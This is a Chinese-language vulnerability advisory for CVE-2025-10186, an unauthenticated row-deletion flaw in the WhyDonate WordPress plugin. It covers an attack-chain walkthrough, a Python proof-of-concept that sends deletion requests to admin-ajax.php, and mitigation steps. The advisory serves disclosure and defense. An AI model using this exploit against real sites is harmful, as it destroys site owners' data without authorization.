CVE-2025-10186：WhyDonate WordPress插件未授权数据删除漏洞

漏洞信息

漏洞编号

CVE-2025-10186

漏洞类型

访问控制缺失/未授权数据删除

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WhyDonate – FREE Donate button – Crowdfunding – Fundraising (WordPress插件 wp-whydonate)

漏洞概述

CVE-2025-10186是存在于WordPress的WhyDonate免费捐赠按钮众筹筹款插件中的一个安全漏洞。该漏洞由WordFence安全团队的安全研究员发现并报告，披露日期为2025年10月15日。该漏洞的根本原因在于插件的`remove_row`函数缺少必要的能力检查（capability check），导致未经身份验证的攻击者可以调用该函数删除数据库中的数据。具体而言，攻击者可以通过构造恶意请求，调用插件提供的AJAX接口或其他入口点，触发`remove_row`函数执行，从而删除`wp_wdplugin_style`表中的任意行数据。

该漏洞的CVSS 3.1评分为5.3分，属于中等严重等级。其攻击向量为网络攻击（AV:N），攻击复杂度低（AC:L），无需任何特权（PR:N），无需用户交互（UI:N）。从影响维度来看，该漏洞对机密性无影响（C:N），对完整性有低影响（I:L），对可用性无影响（A:N）。虽然该漏洞的影响范围有限（仅限于删除样式表中的数据行），但由于无需认证即可利用，且利用复杂度极低，仍然对使用该插件的WordPress网站构成了实质性的安全威胁。

该漏洞影响了该插件的所有版本，最高至4.0.15版本。受影响的网站可能面临网站样式被恶意篡改或删除的风险，影响网站的正常展示和用户体验。建议所有使用该插件的WordPress网站管理员尽快更新到修复版本，以消除安全风险。

技术细节

该漏洞的技术根源在于WordPress插件开发中常见的安全反模式——缺少能力检查（Missing Capability Check）。在WordPress插件开发中，所有涉及数据修改的AJAX接口或管理功能都应该通过`current_user_can()`函数验证当前用户是否具有执行该操作的权限。然而，WhyDonate插件的`remove_row`函数在处理删除请求时，未对调用者的身份和权限进行任何验证。

具体利用方式如下：攻击者首先识别目标网站是否安装了WhyDonate插件（版本≤4.0.15）。然后，攻击者构造一个针对插件AJAX端点（如`wp_ajax_*`或`wp_ajax_nopriv_*`钩子注册的处理函数）的HTTP请求。由于该端点使用了`wp_ajax_nopriv_`前缀，意味着即使未登录的用户也可以访问该端点。请求中包含`action`参数指向`remove_row`对应的处理器，以及要删除的行标识符（如行ID）。当服务器接收到该请求后，插件直接执行`remove_row`函数，从`wp_wdplugin_style`数据库表中删除对应的记录，整个过程不进行任何身份验证或权限检查。

由于该漏洞无需认证（PR:N）、无需用户交互（UI:N）且攻击复杂度低（AC:L），攻击者可以编写自动化脚本批量扫描并利用存在漏洞的WordPress网站。需要注意的是，虽然该漏洞的影响仅限于完整性（数据删除），但攻击者可以通过反复删除样式数据来破坏网站的正常显示，甚至可能结合其他漏洞进行更复杂的攻击链构造。

攻击链分析

STEP 1

步骤1：目标识别

攻击者通过指纹识别技术（如查看页面源代码中的插件特征、检查/wp-content/plugins/wp-whydonate/目录是否存在等）确定目标WordPress网站是否安装了WhyDonate插件，并确认其版本是否≤4.0.15。

STEP 2

步骤2：漏洞端点定位

攻击者分析插件源码或通过已知信息确定`remove_row`功能对应的AJAX端点（通常通过wp_ajax_nopriv_钩子注册），该端点无需认证即可访问。

STEP 3

步骤3：构造恶意请求

攻击者构造一个HTTP POST请求，目标是/wp-admin/admin-ajax.php，在请求体中包含action参数（指向remove_row处理器）和要删除的行标识符。

STEP 4

步骤4：发送未认证请求

攻击者在不携带任何认证凭据（如Cookie、Nonce）的情况下向目标服务器发送构造好的恶意请求，利用缺失的能力检查漏洞。

STEP 5

步骤5：数据删除执行

服务器接收请求后，插件直接执行remove_row函数，从wp_wdplugin_style数据库表中删除指定行记录，整个过程绕过了身份验证和权限检查。

STEP 6

步骤6：影响确认

攻击者通过访问网站前端确认样式数据是否被成功删除，网站样式显示是否受到影响，验证漏洞利用成功。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-10186 PoC - WhyDonate Plugin Unauthorized Row Deletion
# Target: WordPress sites with WhyDonate plugin <= 4.0.15

TARGET_URL = "http://target-wordpress-site.com"
# The AJAX action endpoint registered by the plugin (wp_ajax_nopriv_*)
AJAX_ENDPOINT = f"{TARGET_URL}/wp-admin/admin-ajax.php"

def exploit_remove_row(row_id):
    """
    Exploit the missing capability check in remove_row function
    to delete rows from wp_wdplugin_style table without authentication.
    """
    # Step 1: Prepare the malicious request payload
    # The action parameter targets the vulnerable AJAX handler
    payload = {
        "action": "whydonate_remove_row",  # AJAX action hook name
        "row_id": str(row_id)              # ID of the row to delete
    }

    # Step 2: Send the unauthenticated request
    # No authentication headers or cookies required
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    try:
        response = requests.post(
            AJAX_ENDPOINT,
            data=payload,
            headers=headers,
            timeout=10
        )

        # Step 3: Check response
        if response.status_code == 200:
            print(f"[+] Row {row_id} deletion request sent successfully")
            print(f"[+] Response: {response.text[:200]}")
            return True
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    # Attempt to delete row ID 1 (or any valid row ID)
    print("[*] CVE-2025-10186 - WhyDonate Plugin Exploit")
    print("[*] Attempting unauthorized row deletion...")
    exploit_remove_row(row_id=1)

影响范围

WhyDonate (wp-whydonate) 插件所有版本 ≤ 4.0.15

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）暂时停用WhyDonate插件，直到确认已升级到安全版本；2）通过WAF或.htaccess规则限制对/wp-admin/admin-ajax.php的未认证POST请求，特别是过滤包含whydonate相关action参数的请求；3）在数据库层面为wp_wdplugin_style表创建定期备份，以便在遭受攻击后能够快速恢复数据；4）监控服务器日志，关注异常的admin-ajax.php请求，及时发现潜在的利用行为；5）考虑使用其他经过安全审计的替代插件替代WhyDonate插件。